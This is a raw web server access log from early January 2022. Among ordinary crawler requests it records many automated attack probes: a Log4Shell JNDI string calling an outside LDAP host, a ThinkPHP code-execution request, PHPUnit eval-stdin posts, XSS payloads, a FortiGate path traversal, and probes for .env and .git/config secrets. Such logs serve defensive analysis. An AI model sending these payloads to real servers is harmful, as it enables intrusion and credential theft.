[01/Jan/2022:01:07:42 +0100] 54.245.195.10 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:09:10 +0100] 34.216.103.84 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:09:59 +0100] 34.209.244.36 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:43:06 +0100] 54.184.86.43 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:43:43 +0100] 52.38.115.189 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:46:13 +0100] 52.32.208.125 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[01/Jan/2022:01:56:35 +0100] 66.249.74.46 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 308
[01/Jan/2022:01:56:35 +0100] 66.249.74.48 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:01:59:35 +0100] 51.158.108.61 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 381
[01/Jan/2022:02:19:30 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[01/Jan/2022:02:35:49 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[01/Jan/2022:02:35:49 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[01/Jan/2022:02:35:50 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /js/app.js HTTP/1.1" 308
[01/Jan/2022:02:35:50 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /js/app.js HTTP/1.1" 308
[01/Jan/2022:02:35:51 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /src/app.js HTTP/1.1" 308
[01/Jan/2022:02:35:51 +0100] 109.237.103.9 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /src/app.js HTTP/1.1" 308
[01/Jan/2022:02:49:38 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[01/Jan/2022:02:49:39 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[01/Jan/2022:02:49:44 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[01/Jan/2022:04:45:19 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[01/Jan/2022:04:50:39 +0100] 23.251.102.74 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[01/Jan/2022:04:53:11 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[01/Jan/2022:05:39:22 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[01/Jan/2022:06:01:07 +0100] 110.235.239.101 TLSv1.2 AES256-SHA "GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1" 465
[01/Jan/2022:06:01:12 +0100] 110.235.239.101 TLSv1.2 AES256-SHA "GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1" 489
[01/Jan/2022:06:01:14 +0100] 110.235.239.101 TLSv1.2 AES256-SHA "GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1" 426
[01/Jan/2022:06:55:58 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /console/ HTTP/1.1" 307
[01/Jan/2022:07:18:19 +0100] 54.151.21.139 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1" -
[01/Jan/2022:07:29:03 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315
[01/Jan/2022:07:38:42 +0100] 23.90.160.122 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[01/Jan/2022:07:50:24 +0100] 65.49.20.66 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[01/Jan/2022:08:16:16 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /_ignition/execute-solution HTTP/1.1" 319
[01/Jan/2022:08:34:49 +0100] 163.172.180.25 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 380
[01/Jan/2022:09:03:32 +0100] 35.233.62.116 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[01/Jan/2022:09:11:47 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:09:23:33 +0100] 101.36.126.176 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383
[01/Jan/2022:09:43:15 +0100] 104.140.188.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 374
[01/Jan/2022:09:49:34 +0100] 192.241.211.129 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[01/Jan/2022:09:52:21 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:09:57:42 +0100] 192.241.215.99 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[01/Jan/2022:10:21:26 +0100] 88.0.214.160 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:10:26:07 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "-" -
[01/Jan/2022:11:27:38 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:11:55:24 +0100] 165.227.131.62 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:12:02:30 +0100] 165.227.131.62 TLSv1.2 AES256-SHA "GET /.env HTTP/1.1" 304
[01/Jan/2022:12:20:39 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[01/Jan/2022:13:21:11 +0100] 128.1.248.26 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[01/Jan/2022:13:28:38 +0100] 213.238.178.239 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /js/app.js HTTP/1.1" 314
[01/Jan/2022:13:28:38 +0100] 213.238.178.239 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /js/app.js HTTP/1.1" 314
[01/Jan/2022:13:28:48 +0100] 192.241.214.175 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[01/Jan/2022:14:16:57 +0100] 167.248.133.43 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[01/Jan/2022:14:16:58 +0100] 167.248.133.43 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:14:29:03 +0100] 92.118.160.57 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[01/Jan/2022:15:00:59 +0100] 51.158.98.24 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393
[01/Jan/2022:15:05:28 +0100] 35.88.16.43 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /owa/auth/logon.aspx HTTP/1.1" 402
[01/Jan/2022:15:26:40 +0100] 23.251.102.74 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /cgi-bin/config.exp HTTP/1.1" 315
[01/Jan/2022:18:05:01 +0100] 178.239.21.103 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 325
[01/Jan/2022:18:05:27 +0100] 5.157.38.50 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 429
[01/Jan/2022:18:05:27 +0100] 5.157.38.50 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[01/Jan/2022:18:05:27 +0100] 5.157.38.50 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[01/Jan/2022:18:33:04 +0100] 192.241.213.196 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[01/Jan/2022:18:47:50 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[01/Jan/2022:18:47:51 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[01/Jan/2022:19:03:03 +0100] 193.118.53.194 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[01/Jan/2022:19:13:29 +0100] 92.118.160.41 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 394
[01/Jan/2022:20:01:44 +0100] 109.237.103.118 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.git/config HTTP/1.1" 310
[01/Jan/2022:20:01:45 +0100] 109.237.103.118 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.git/config HTTP/1.1" 310
[01/Jan/2022:21:18:37 +0100] 163.172.180.25 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 385
[01/Jan/2022:22:20:59 +0100] 89.248.165.52 - - "-" -
[01/Jan/2022:22:22:22 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[01/Jan/2022:22:26:18 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 330
[02/Jan/2022:00:01:54 +0100] 172.105.152.112 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /admin/index.php?login HTTP/1.1" 316
[02/Jan/2022:00:22:15 +0100] 139.162.145.250 TLSv1.2 AES256-SHA "GET /bag2 HTTP/1.1" 304
[02/Jan/2022:00:26:01 +0100] 192.241.195.22 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[02/Jan/2022:00:28:50 +0100] 192.241.204.149 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[02/Jan/2022:00:28:56 +0100] 198.199.95.200 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[02/Jan/2022:00:39:40 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[02/Jan/2022:00:50:35 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327